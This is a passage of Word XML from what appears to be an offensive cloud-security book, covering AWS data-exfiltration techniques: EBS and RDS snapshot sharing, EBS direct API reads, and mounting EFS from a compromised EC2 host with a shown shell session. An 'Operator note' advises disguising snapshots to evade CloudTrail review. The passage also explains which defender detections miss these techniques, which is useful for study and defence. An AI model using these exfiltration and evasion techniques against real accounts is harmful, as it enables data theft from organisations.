    <w:p w14:paraId="1AADCB11" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1128937003"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">{ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"VolumeId"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"vol-0fff00001"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"State"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"creating"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1854162F" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EEF6FB"/>
        <w:divId w:val="977681933"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Operator note: the snapshot description field</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE3B5BB" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EEF6FB"/>
        <w:spacing w:after="216"/>
        <w:divId w:val="977681933"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>--description</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> field on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>CreateSnapshot</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> appears in the CloudTrail event parameters. Name your snapshot to match the organization's backup pattern. If the organization's AWS Backup plan creates snapshots with descriptions like </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>AwsBackup_MyBackupPlan_i-xxxxxx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, use that. If a nightly cron creates descriptions like </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>nightly-snap-&lt;date&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, use that. Defenders who grep CloudTrail for out-of-pattern </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>CreateSnapshot</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> events rarely grep them for in-pattern ones.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76BFAAA9" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>11.3  EBS direct API for surgical reads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32030C9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EBS direct API (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ebs:ListSnapshotBlocks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ebs:GetSnapshotBlock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">) allows block-level read access to a snapshot without creating a volume. This is surgical — it is used for forensic dumps, backup utilities, and, increasingly, for attacker tooling that avoids the side-effects of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>CreateVolume</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">. Tools such as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>dsnap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> and the authors' own prototypes demonstrate that you can read an entire snapshot block-by-block across the network using HTTP APIs and reconstruct the filesystem offline. The IAM required is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ebs:ListSnapshotBlocks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ebs:GetSnapshotBlock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> on the snapshot ARN; these are frequently granted implicitly by any wildcard </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ebs:*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> and are almost never audited separately.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A076FD9" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>11.4  EFS and the NFS trust surface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5AB3F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Elastic File System exposes NFSv4 mounts inside a VPC through mount targets. The security boundary is partly IAM (EFS file system policies, IAM authorization for NFS) and partly network (security groups on the mount targets). Attackers who land on an EC2 instance in the same VPC frequently find EFS mount targets reachable with no IAM authentication required — the default EFS posture for a long time was "mount targets accept any traffic that reaches them from the VPC". If you have a filesystem id and a mount</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> target DNS name, a one-liner suffices:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B80126" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="239758903"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="p"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>root@pwned-ec2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="d"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>~#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>mount</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>-t nfs4 -o nfsvers=4.1,rsize=1048576,wsize=1048576,hard,timeo=600 \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7210DB87" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="239758903"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">    fs-0abc1234.efs.us-east-1.amazonaws.com:/ /mnt/efs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC2CA40" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="239758903"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="p"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>root@pwned-ec2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="d"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>~#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ls</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> -la /mnt/efs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD5A4A2" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="239758903"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>total 28</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0119BB37" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="239758903"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>drwxr-xr-x  7 root  root  6144 Apr 19 14:22 .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="532FD0B8" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="239758903"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>drwxr-xr-x  3 root  root  4096 Apr 20 10:01 ..</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C671555" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="239758903"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>drwxr-xr-x  6 1001  1001  6144 Apr 15 09:18 app-data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49AA5829" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="239758903"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>drwxr-xr-x 12 1002  1002  6144 Apr 11 11:44 user-homes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27050785" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="239758903"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>drwxr-xr-x  3 root  root  6144 Mar 02 08:05 .backups</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06FE3F0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EFS file system policies can constrain this. A policy of the form </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>deny mount unless the IAM principal is tagged X</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> forces IAM authorization on NFS mounts, at the cost of requiring all clients to use the EFS mount helper with IAM. Such policies are uncommon in practice — as of 2025 AWS's own config rule </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>efs-file-system-policy-required</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> was one of the lower-compliance rules in the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Security Hub AWS Foundational Security Best Practices</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> conformance pack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C3B9FD" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>11.5  Storage-plane detections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C31AB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S3 access logs (bucket logging to another bucket) and S3 data events in CloudTrail are the two defender signals. The first requires explicit configuration on each bucket; the second requires data-event logging in CloudTrail (not on by default, billed separately, often misconfigured to log only specific buckets). GuardDuty produces findings such as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Exfiltration:S3/AnomalousBehavior</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> (unusual </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>GetObject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> volume or origin) and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Policy:S3/BucketAnonymousAccessGranted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> (public ACL change). None of these see replication, none see snapshot sharing, none see EFS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE3D4D7" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Key takeaways</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B68FC18" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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S3 replication, if an attacker can configure it, is a persistent exfiltration channel that blends with normal durability patterns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359C0334" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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EBS snapshot sharing is the most operationally durable large-data-at-rest exfiltration primitive in AWS; the data never touches the defender's VPC.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D33BDAE" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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The EBS direct API allows surgical, network-visible block reads without </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>CreateVolume</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>; it is rarely audited separately.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0500833F" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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EFS mount targets are frequently reachable from compromised EC2 with no IAM authentication; file-system policies that enforce IAM-NFS are uncommon.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB7C2DA" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Storage-plane detections (S3 access logs, CloudTrail data events, GuardDuty S3 findings) see only the object-level API; they do not see replication, snapshot sharing, or EFS NFS traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47BB2386" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Chapter 12</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:br/>
        <w:t>Data Services: RDS, DynamoDB, Redshift, Athena</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714EAF1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Managed data services carry the richest data in most AWS environments — customer PII in RDS, OLTP state in DynamoDB, historical analytics in Redshift, ad-hoc queries over S3 data lakes in Athena. From an offensive standpoint, each one has a distinct out-of-band exfiltration primitive that bypasses the application-level access controls the organization almost certainly built. This chapter walks the four canonical services, emphasizing the primitives that are not obvious from the service documentation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A0A06F" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>12.1  RDS snapshot sharing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1737A57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RDS analogue of EBS snapshot exfiltration is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>rds:ModifyDBSnapshotAttribute</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">. An attacker with this permission on a DB snapshot (automated or manual) and access to a target account id can share the snapshot cross-account; the target account then does a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>restore-db-instance-from-db-snapshot</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> into its own VPC and queries the resulting RDS instance directly. As with EBS, KMS encryption is the main friction. If the snapshot is encrypted with the AWS-managed KMS key (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>aws/rds</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">), the snapshot cannot be shared cross-account at all — the attacker must first copy it to a customer-managed key whose policy permits cross-account use. The IAM required is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>rds:CopyDBSnapshot</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> plus KMS permissions on both keys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD338F8" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:divId w:val="604769494"/>
